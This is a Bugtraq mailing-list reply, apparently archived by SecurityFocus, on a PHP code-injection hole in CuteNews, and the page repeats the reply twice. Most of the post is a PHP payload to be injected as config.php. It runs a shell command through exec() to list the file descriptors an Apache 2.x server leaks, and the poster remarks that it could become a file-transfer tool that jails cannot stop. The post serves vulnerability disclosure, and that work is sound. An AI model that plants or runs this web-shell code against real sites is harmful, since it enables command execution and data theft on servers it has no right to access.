Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Re: PHP code injection in CuteNews
Feb 28 2003 10:18PM
Steve Grubb (linux_4ever yahoo com)
In-Reply-To: <E18ndJT-000JS2-00 (at) f19.mail (dot) ru [email concealed]>
Hello,
If the cutenews website is running apache 2.x which
leaks descriptors to all kinds of things
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2
Then you can do this:
config.php =
<html><head><title>File List</title></head>
<body> <?php
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
$match = preg_split("/> /", $item);
if ($match[1]) {
if (preg_match("/\//", $match[1])) {
echo $match[1]; echo "<br>";
}
}
}
?> </body></html>
it doesn't take alot more to make this a fully
clickable file transfer utility that Sandboxes or Jails
cannot protect.
-Steve Grubb
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Hello,
If the cutenews website is running apache 2.x which
leaks descriptors to all kinds of things
http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2
Then you can do this:
config.php =
<html><head><title>File List</title></head>
<body> <?php
$cmd = "/bin/ls -l /proc/$$/fd";
exec($cmd, $dir_listing, $status);
foreach($dir_listing as $item) {
$match = preg_split("/> /", $item);
if ($match[1]) {
if (preg_match("/\//", $match[1])) {
echo $match[1]; echo "<br>";
}
}
}
?> </body></html>
it doesn't take alot more to make this a fully
clickable file transfer utility that Sandboxes or Jails
cannot protect.
-Steve Grubb
[ reply ]